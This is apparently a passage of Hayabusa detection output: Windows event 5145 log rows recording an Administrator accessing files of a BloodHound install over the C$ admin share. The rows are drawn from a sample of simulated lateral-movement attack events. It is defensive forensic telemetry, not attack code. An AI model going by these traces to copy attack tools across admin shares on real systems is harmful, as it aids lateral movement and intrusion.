+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 
| LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 
